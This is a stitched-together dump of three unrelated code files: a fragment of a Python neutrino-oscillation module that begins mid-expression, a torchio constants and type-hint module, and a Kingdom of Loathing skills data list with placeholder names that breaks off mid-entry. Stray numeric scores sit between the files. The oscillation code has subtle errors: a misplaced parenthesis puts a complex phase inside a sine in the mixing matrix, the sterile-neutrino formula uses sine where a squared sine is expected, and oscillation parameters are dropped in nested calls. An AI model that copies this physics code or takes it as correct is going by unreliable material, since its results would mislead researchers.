np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * ((epsi.ee() + np.diag(np.array([1, 0, 0]))) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): for j in range(3): theta = (w[i]-w[j]) * length res += v[ff, i] * np.conj(v[fi, i]) * np.conj(v[ff, j]) * v[fi, j] * (np.cos(theta) - 1j * np.sin(theta)) return np.real(res) def survival_const_amp(ev, length=0.0, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): """ survival/transitional amplitude with constant matter density :param ev: nuetrino energy in MeV :param length: oscillation length in meters :param epsi: epsilons :param nui: initail flavor :param nuf: final flavor :param op: oscillation parameters :param ne: electron number density in MeV^3 :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} fi = dic[nui] ff = dic[nuf] length = length / meter_by_mev if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * (epsi.ee() + np.diag(np.array([1, 0, 0])) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): # for j in range(3): theta = (w[i]) * length res += v[ff, i] * np.conj(v[fi, i]) * (np.cos(theta) - 1j * np.sin(theta)) return res def survival_average(ev, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} op = op.copy() fi = dic[nui] ff = dic[nuf] if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * ((epsi.ee() + np.diag(np.array([1, 0, 0]))) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): res += v[ff, i] * 
np.conj(v[fi, i]) * np.conj(v[ff, i]) * v[fi, i] return np.real(res) def survial_atmos(ev, zenith=1.0, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ survival probability of atmospherical neutrino, assuming 2 layers of the earth, and eath is perfect sphere, it depends on zenith angle :param ev: nuetrino energy in MeV :param zenith: cosine of zenith angle respect to the detector, upward is positive :param epsi: NSI parameters :param nui: initial flavor :param nuf: final flavor :param op: oscillation parameters :return: survival probability in this direction """ op = op.copy() n_core = 11850.56/1.672621898e-27/2*(meter_by_mev**3) n_mantle = 4656.61/1.672621898e-27/2*(meter_by_mev**3) r_core = 3480000 r_mantle = 6368000 cos_th = -np.sqrt(r_mantle**2 - r_core**2) / r_mantle if zenith >= 0: return 1 if nui == nuf else 0 elif zenith >= cos_th: length = -r_mantle * zenith * 2 return survival_const(ev, length, epsi=epsi, nui=nui, nuf=nuf, op=op, ne=n_mantle) else: vert = r_mantle * np.sqrt(1 - zenith**2) l_core = 2 * np.sqrt(r_core**2 - vert**2) l_mantle_half = -r_mantle * zenith - l_core / 2 res = 0 if nuf[-1] == 'r': f_list = ['ebar', 'mubar', 'taubar'] else: f_list = ['e', 'mu', 'tau'] for i in f_list: for j in f_list: res += survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=nui, nuf=i, op=op, ne=n_mantle) * \ survival_const_amp(ev, l_core, epsi=epsi, nui=i, nuf=j, ne=n_core) * \ survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=j, nuf=nuf, ne=n_mantle) return np.real(res * np.conj(res)) def survial_atmos_amp(ev, zenith=1.0, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ survival amplitude of atmospherical neutrino assuming 2 layers of the earth, and eath is perfect sphere, it depends on zenith angle :param ev: nuetrino energy in MeV :param zenith: cosine of zenith angle respect to the detector, upward is positive :param epsi: NSI parameters :param nui: initial flavor :param nuf: final flavor :param op: oscillation parameters :return: survival probability in this direction """ op = op.copy() n_core = 11850.56/1.672621898e-27/2*(meter_by_mev**3) n_mantle = 4656.61/1.672621898e-27/2*(meter_by_mev**3) r_core = 3480000 r_mantle = 6368000 cos_th = -np.sqrt(r_mantle**2 - r_core**2) / r_mantle if zenith >= 0: return 1 if nui == nuf else 0 elif zenith >= cos_th: length = -r_mantle * zenith * 2 return survival_const(ev, length, epsi=epsi, nui=nui, nuf=nuf, op=op, ne=n_mantle) else: vert = r_mantle * np.sqrt(1 - zenith**2) l_core = 2 * np.sqrt(r_core**2 - vert**2) l_mantle_half = -r_mantle * zenith - l_core / 2 res = 0 if nuf[-1] == 'r': f_list = ['ebar', 'mubar', 'taubar'] else: f_list = ['e', 'mu', 'tau'] for i in f_list: for j in f_list: res += survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=nui, nuf=i, op=op, ne=n_mantle) * \ survival_const_amp(ev, l_core, epsi=epsi, nui=i, nuf=j, ne=n_core) * \ survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=j, nuf=nuf, ne=n_mantle) return res class Oscillator: def __init__(self, layers, nsi_parameter: NSIparameters, oscillation_parameter: OSCparameters, **kwargs): """ init :param layers: :param nsi_parameter: :param oscillation_parameter: :param kwargs: the parameters that goes into each layer """ self.layers = layers self.nsi_parameter = nsi_parameter self.oscillation_paramter = oscillation_parameter self.kwargs = kwargs def _dfs(self, ev, amplist, inter, cur_layer, cur_value, nui, nuf): if cur_layer == len(self.layers)-1: cur_value *= self.layers[cur_layer](ev, nui=nui, nuf=nuf, 
epsi=self.nsi_parameter, op=self.oscillation_paramter, **self.kwargs) amplist.append(cur_value) return for internu in inter: cv = cur_value * self.layers[cur_layer](ev, nui=nui, nuf=internu, epsi=self.nsi_parameter, op=self.oscillation_paramter, **self.kwargs) self._dfs(ev, amplist, inter, cur_layer+1, cv, internu, nuf) def transition_probability(self, ev, nui, nuf): if (nui[-1] == 'r' and nuf[-1] != 'r') or (nui[-1] != 'r' and nuf[-1] == 'r'): return 0 inter = ['e', 'mu', 'tau'] if nui[-1] == 'r': inter = ['ebar', 'mubar', 'taubar'] amplist = [] self._dfs(ev, amplist, inter, 0, 1, nui, nuf) amp = sum(amplist) return np.real(amp * np.conj(amp)) def transform(self, flux): if flux.nu is None: nu = None else: nu = {'ev': flux.ev} for flavor in ['e', 'mu', 'tau']: if flux.nu[flavor] is not None: if 'e' not in nu: nu['e'] = np.zeros_like(flux.ev) nu['mu'] = np.zeros_like(flux.ev) nu['tau'] = np.zeros_like(flux.ev) for i in range(flux.ev.shape[0]): nu['e'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'e') nu['mu'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'mu') nu['tau'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'tau') for flavor in ['ebar', 'mubar', 'taubar']: if flux.nu[flavor] is not None: if 'ebar' not in nu: nu['ebar'] = np.zeros_like(flux.ev) nu['mubar'] = np.zeros_like(flux.ev) nu['taubar'] = np.zeros_like(flux.ev) for i in range(flux.ev.shape[0]): nu['ebar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'ebar') nu['mubar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'mubar') nu['taubar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'taubar') if flux.delta_nu is None: dnu = None else: dnu = {} for flavor in ['e', 'mu', 'tau']: if flux.delta_nu[flavor] is not None: if 'e' not in dnu: dnu['e'] = [] dnu['mu'] = [] dnu['tau'] = [] for d in flux.delta_nu[flavor]: dnu['e'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'e'))) dnu['mu'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'mu'))) dnu['tau'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'tau'))) for flavor in ['ebar', 'mubar', 'taubar']: if flux.delta_nu[flavor] is not None: if 'ebar' not in dnu: dnu['ebar'] = [] dnu['mubar'] = [] dnu['taubar'] = [] for d in flux.delta_nu[flavor]: dnu['ebar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'ebar'))) dnu['mubar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'mubar'))) dnu['taubar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'taubar'))) from .flux import NeutrinoFlux return NeutrinoFlux(continuous_fluxes=nu, delta_fluxes=dnu, norm=flux.norm/((100 * meter_by_mev) ** 2)) def change_parameters(self, **kwargs): for k, v in kwargs.items(): self.kwargs[k] = v class OscillatorFactory: def __init__(self): self.oscillator_list = ['solar', 'atmospheric', 'beam'] def print_available(self): print(self.oscillator_list) def get(self, oscillator_name, **kwargs): if oscillator_name not in self.oscillator_list: raise Exception('such oscillator not in factory yet, consider build your own.') if oscillator_name == 'solar': return Oscillator([survival_solar_amp], **kwargs) if oscillator_name == 'beam': if 'length' not in kwargs: raise Exception('Please specify the oscillation length in meters.') return Oscillator([survival_const_amp], **kwargs) if oscillator_name == 'atmospheric': if 'zenith' not in kwargs: raise Exception('please 
specify zenith angle') return Oscillator([survial_atmos_amp], **kwargs) def survival_sterile(ev, dm41=0, ua4=(0,0,0), epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e', lenth=19.3/meter_by_mev): idx = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} ni = idx[nui] nf = idx[nuf] if ni == nf: u = ua4[ni] return 1 - 4 * u * (1 - u) * np.sin(dm41 * lenth / 4 / ev) else: ua = ua4[ni] ub = ua4[nf] return 4 * ua * ub * np.sin(dm41 * lenth / 4 / ev)
2.3125
2
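A hedged sketch of driving the factory and oscillator classes above. The package import paths are inferred from the repo layout (pyCEvNS/oscillation.py), and the 1000 m baseline and 30 MeV energy are illustrative numbers only.

from pyCEvNS.oscillation import OscillatorFactory              # path inferred from repo layout
from pyCEvNS.parameters import NSIparameters, oscillation_parameters

factory = OscillatorFactory()
factory.print_available()              # ['solar', 'atmospheric', 'beam']
osc = factory.get('beam',
                  nsi_parameter=NSIparameters(),
                  oscillation_parameter=oscillation_parameters(),
                  length=1000.0)       # metres, required by the beam oscillator
print(osc.transition_probability(30.0, 'mu', 'e'))             # 30 MeV nu_mu -> nu_e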
torchio/torchio.py
MonsieurWave/torchio
0
12751787
<reponame>MonsieurWave/torchio<filename>torchio/torchio.py """Main module.""" from pathlib import Path from typing import Union, Tuple, Callable import torch import numpy as np # Image types INTENSITY = 'intensity' LABEL = 'label' SAMPLING_MAP = 'sampling_map' # Keys for dataset samples PATH = 'path' TYPE = 'type' STEM = 'stem' DATA = 'data' AFFINE = 'affine' # For aggregator IMAGE = 'image' LOCATION = 'location' # In PyTorch convention CHANNELS_DIMENSION = 1 # For typing hints TypePath = Union[Path, str] TypeNumber = Union[int, float] TypeData = Union[torch.Tensor, np.ndarray] TypeTripletInt = Tuple[int, int, int] TypeTripletFloat = Tuple[float, float, float] TypeTuple = Union[int, TypeTripletInt] TypeRangeInt = Union[int, Tuple[int, int]] TypePatchSize = Union[int, Tuple[int, int, int]] TypeRangeFloat = Union[float, Tuple[float, float]] TypeCallable = Callable[[torch.Tensor], torch.Tensor]
1.46875
1
src/kol/data/Skills.py
danheath/temppykol
19
12751915
<reponame>danheath/temppykol skills = [ { "id" : "0001", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumInebriety" : "+5", }, }, { "id" : "0002", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "0003", "name" : "<NAME> <NAME>.", "type" : "Buff", "mpCost" : 5, "isPermable" : False, }, { "id" : "0004", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, "isPermable" : False, }, { "id" : "0005", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumFullness" : "+5", }, }, { "id" : "0006", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumSpleen" : "+5", }, }, { "id" : "0010", "name" : "<NAME>", "type" : "Passive", "effects" : { "itemDrop" : "+10%", }, }, { "id" : "0011", "name" : "<NAME>", "type" : "Passive", "effects" : { "meatDrop" : "+10%", }, }, { "id" : "0012", "name" : "<NAME>", "type" : "Passive", }, { "id" : "0013", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumHP" : "+5%", }, }, { "id" : "0014", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumMP" : "+5%", }, }, { "id" : "0015", "name" : "CLEESH", "type" : "Combat", "mpCost" : 10, }, { "id" : "0019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 40, "isAutomaticallyPermed" : True, }, { "id" : "0020", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, }, { "id" : "0021", "name" : "Lust", "type" : "Passive", "isPermable" : False, "effects" : { "combatInitiative" : "+50%", "spellDamage" : "-5", "meleeDamage" : "-5", }, }, { "id" : "0022", "name" : "Gluttony", "type" : "Passive", "isPermable" : False, "effects" : { "strengthensFood" : True, "statsPerFight" : "-2", }, }, { "id" : "0023", "name" : "Greed", "type" : "Passive", "isPermable" : False, "effects" : { "meatDrop" : "+50%", "itemDrop" : "-15%", }, }, { "id" : "0024", "name" : "Sloth", "type" : "Passive", "isPermable" : False, "effects" : { "damageReduction" : "+8", "combatInitiative" : "-25%", }, }, { "id" : "0025", "name" : "Wrath", "type" : "Passive", "isPermable" : False, "effects" : { "spellDamage" : "+10", "meleeDamage" : "+10", "damageReduction" : "-4", }, }, { "id" : "0026", "name" : "Envy", "type" : "Passive", "isPermable" : False, "effects" : { "itemDrop" : "+30%", "meatDrop" : "-25%", }, }, { "id" : "0027", "name" : "Pride", "type" : "Passive", "isPermable" : False, "effects" : { "statsPerFight" : "+4", "weakensFood" : True, }, }, { "id" : "0028", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0029", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0030", "name" : "Snowclone", "type" : "Combat", "mpCost" : 120, }, { "id" : "0031", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0032", "name" : "Eggsplosion", "type" : "Combat", "mpCost" : 120, }, { "id" : "0033", "name" : "Mudbath", "type" : "Combat", "mpCost" : 30, }, { "id" : "0036", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0037", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0038", "name" : "<NAME>", "type" : "Passive", "effects" : { "itemDrop" : "+5%", }, }, { "id" : "0039", "name" : "<NAME>", "type" : "Passive", "effects" : { "meatDrop" : "+10%", }, }, { "id" : "0040", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumHP" : "+10%", }, }, { "id" : "0041", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumMP" : "+10%", }, }, { "id" : "0042", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0043", "name" : "<NAME>", "type" : 
"Combat", "mpCost" : 30, }, { "id" : "0044", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 30, }, { "id" : "1000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "1003", "name" : "Thrust-Smack", "type" : "Combat", "mpCost" : 3, }, { "id" : "1004", "name" : "Lunge-Smack", "type" : "Combat", "mpCost" : 5, }, { "id" : "1005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 8, }, { "id" : "1006", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1007", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 7, }, { "id" : "1008", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1009", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1010", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1011", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1012", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1015", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1016", "name" : "Pulverize", "type" : "Passive", }, { "id" : "1017", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1019", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1020", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "2000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "2003", "name" : "Headbutt", "type" : "Combat", "mpCost" : 3, }, { "id" : "2004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2005", "name" : "Shieldbutt", "type" : "Combat", "mpCost" : 5, }, { "id" : "2006", "name" : "Armorcraftiness", "type" : "Passive", }, { "id" : "2007", "name" : "<NAME>", "type" : "Buff", "mpCost" : 6, }, { "id" : "2008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "2009", "name" : "Empathy of the Newt", "type" : "Buff", "mpCost" : 15, }, { "id" : "2010", "name" : "<NAME>", "type" : "Buff", "mpCost" : 8, }, { "id" : "2011", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2012", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "2014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2015", "name" : "Kneebutt", "type" : "Combat", "mpCost" : 4, }, { "id" : "2016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2020", "name" : "Hero of the Half-Shell", "type" : "Passive", }, { "id" : "2021", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2022", "name" : "<NAME>", "type" : "Combat", "mpCost" : 20, }, { "id" : "2103", "name" : "Head + Knee Combo", "type" : "Combat", "mpCost" : 8, }, { "id" : "2105", "name" : "Head + Shield Combo", "type" : "Combat", "mpCost" : 9, }, { "id" : "2106", "name" : "Knee + Shield Combo", "type" : "Combat", "mpCost" : 10, }, { "id" : "2107", "name" : "Head + Knee + Shield Combo", "type" : "Combat", "mpCost" : 13, }, { "id" : "3000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "3003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 4, }, { "id" : "3004", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "3005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 7, }, { "id" : "3006", "name" : "Pastamastery", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3007", "name" : "<NAME>", "type" : "Combat", "mpCost" : 19, }, { "id" : "3008", "name" : "<NAME>", "type" : "Combat", "mpCost" : 35, }, { "id" : "3009", "name" : "<NAME>", "type" : "Combat / Noncombat", "mpCost" : 6, }, { "id" : "3010", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 12, }, { "id" : "3011", "name" : "Spirit 
of Rigatoni", "type" : "Passive", }, { "id" : "3012", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 20, }, { "id" : "3014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3015", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3017", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 35, }, { "id" : "3020", "name" : "<NAME>", "type" : "Combat", "mpCost" : 1, }, { "id" : "3101", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3102", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3103", "name" : "Spirit of Garlic", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3104", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3105", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "4000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "4003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "4004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4005", "name" : "Saucestorm", "type" : "Combat", "mpCost" : 12, }, { "id" : "4006", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "4007", "name" : "Elemental Saucesphere", "type" : "Buff", "mpCost" : 10, }, { "id" : "4008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, }, { "id" : "4009", "name" : "<NAME>", "type" : "Combat", "mpCost" : 23, }, { "id" : "4010", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4011", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "4012", "name" : "Saucegeyser", "type" : "Combat", "mpCost" : 40, }, { "id" : "4014", "name" : "<NAME>", "type" : "Combat", "mpCost" : 4, }, { "id" : "4015", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4017", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4019", "name" : "Scarysauce", "type" : "Buff", "mpCost" : 10, }, { "id" : "4020", "name" : "Salsaball", "type" : "Combat", "mpCost" : 1, }, { "id" : "5000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "5003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "5004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "5006", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5007", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 8, }, { "id" : "5008", "name" : "<NAME>: <NAME>", "type" : "Combat", "mpCost" : 7, }, { "id" : "5009", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5010", "name" : "Overdeveloped Sense of Self Preservation", "type" : "Passive", }, { "id" : "5011", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 12, }, { "id" : "5012", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "5014", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "5015", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5017", "name" : "Smooth Movement", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "5018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 8, }, { "id" : "6000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "6003", "name" : "<NAME>", "type" : 
"Buff", "mpCost" : 40, }, { "id" : "6004", "name" : "<NAME>", "type" : "Buff", "mpCost" : 2, }, { "id" : "6005", "name" : "<NAME>", "type" : "Buff", "mpCost" : 4, }, { "id" : "6006", "name" : "<NAME>", "type" : "Buff", "mpCost" : 7, }, { "id" : "6007", "name" : "<NAME>", "type" : "Buff", "mpCost" : 3, }, { "id" : "6008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, }, { "id" : "6009", "name" : "<NAME>", "type" : "Buff", "mpCost" : 13, }, { "id" : "6010", "name" : "<NAME>", "type" : "Buff", "mpCost" : 11, }, { "id" : "6011", "name" : "The Psalm of Pointiness", "type" : "Buff", "mpCost" : 15, }, { "id" : "6012", "name" : "Jackasses' Symphony of Destruction", "type" : "Buff", "mpCost" : 9, }, { "id" : "6013", "name" : "<NAME> Superiority", "type" : "Buff", "mpCost" : 30, }, { "id" : "6014", "name" : "The Ode to Booze", "type" : "Buff", "mpCost" : 50, }, { "id" : "6015", "name" : "The Sonata of Sneakiness", "type" : "Buff", "mpCost" : 20, }, { "id" : "6016", "name" : "<NAME>", "type" : "Buff", "mpCost" : 20, }, { "id" : "6017", "name" : "<NAME>", "type" : "Buff", "mpCost" : 30, }, { "id" : "6018", "name" : "<NAME>", "type" : "Buff", "mpCost" : 9, }, { "id" : "6020", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6021", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6022", "name" : "Elron's Explosive Etude", "type" : "Buff", "mpCost" : 50, }, { "id" : "6023", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6024", "name" : "Prelude of Precision", "type" : "Buff", "mpCost" : 50, }, { "id" : "7001", "name" : "<NAME> To Your Vampiric Urges", "type" : "Combat", "mpCost" : 0, }, { "id" : "7002", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7004", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7006", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7007", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7008", "name" : "<NAME>", "type" : "Combat", }, { "id" : "7009", "name" : "<NAME>", "type" : "Combat", "mpCost" : 2, }, { "id" : "7010", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7011", "name" : "Fire Blue Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7012", "name" : "Fire Orange Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7013", "name" : "Fire Purple Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7014", "name" : "Fire Black Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7015", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "7016", "name" : "Start Trash Fire", "type" : "Combat", "mpCost" : 100, }, { "id" : "7017", "name" : "Overload Discarded Refrigerator", "type" : "Combat", "mpCost" : 100, }, { "id" : "7018", "name" : "Trashquake", "type" : "Combat", "mpCost" : 100, }, { "id" : "7019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 100, }, { "id" : "7020", "name" : "<NAME>", "type" : "Combat", "mpCost" : 100, }, { "id" : "7021", "name" : "<NAME>", "type" : "Combat", }, { "id" : "7022", "name" : "Ask <NAME>", "type" : "Combat", }, { "id" : "7023", "name" : "Ask <NAME> Rough the Hobo Up a Bit", "type" : "Combat", }, { "id" : "7024", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7025", "name" : "<NAME> You-Eye View", "type" : "Combat", "mpCost" : 30, }, { "id" : "7038", "name" : "<NAME>", "type" : "Combat", "mpCost" 
